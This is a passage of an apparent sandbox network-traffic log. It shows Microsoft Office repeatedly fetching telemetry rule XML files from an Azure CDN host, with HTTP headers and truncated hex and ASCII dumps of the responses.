                                                  2024-10-13 17:34:31 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.44988213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                  ETag: "0x8DC582BE39DFC9B"
                                                  x-ms-request-id: defb5908-e01e-0033-2de2-1a4695000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cfqxt4wrzg7st2fm8000000056g00000000h4g1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.44988313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF66E42D"
                                                  x-ms-request-id: 7d81a33d-101e-00a2-42e1-1a9f2e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cf4g2pjavqhm24vp400000005bg00000000cyub
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  118192.168.2.44988413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE017CAD3"
                                                  x-ms-request-id: b7d01dc4-701e-0032-5f3b-1ca540000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cfpm9w8b1ybgtytds000000034000000000a74z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  119192.168.2.44988513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:32 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                  ETag: "0x8DC582BE6431446"
                                                  x-ms-request-id: 07f85e87-a01e-003d-78df-1a98d7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173432Z-17db6f7c8cfqkqk8bn4ck6f72000000004v000000000hvex
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:32 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  120192.168.2.44988613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:32 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:32 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                  ETag: "0x8DC582BDE12A98D"
                                                  x-ms-request-id: 76e86a3b-101e-0046-5a47-1c91b0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173432Z-17db6f7c8cfpm9w8b1ybgtytds000000037g000000001tna
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:32 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.44988713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:32 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:32 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE022ECC5"
                                                  x-ms-request-id: e6504dd7-401e-0015-6cce-1a0e8d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173432Z-17db6f7c8cfwtn5x6ye8p8q9m000000003u0000000006x57
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:32 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.44988813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:32 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:32 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1389
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE10A6BC1"
                                                  x-ms-request-id: d1e3fcb8-a01e-001e-0795-1b49ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173432Z-17db6f7c8cfbd7pgux3k6qfa60000000044g000000006ncs
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:32 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.44988913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:32 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:32 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1352
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                  ETag: "0x8DC582BE9DEEE28"
                                                  x-ms-request-id: 0b054cf6-001e-00a2-745b-1cd4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173432Z-17db6f7c8cfpm9w8b1ybgtytds000000036g000000004yyy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:32 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.44989013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1405
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE12B5C71"
                                                  x-ms-request-id: 745fe90a-101e-005a-7f69-1c882b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cf9c22xp43k2gbqvn00000002vg000000007w9a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.44989113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:33 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:33 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1368
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDC22447"
                                                  x-ms-request-id: efbad5a3-301e-0000-2ec0-1aeecc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173433Z-17db6f7c8cfp6mfve0htepzbps00000004rg0000000015gk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:33 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.44989213.107.246.45443
                                                  TimestampBytes transferredDirectionData
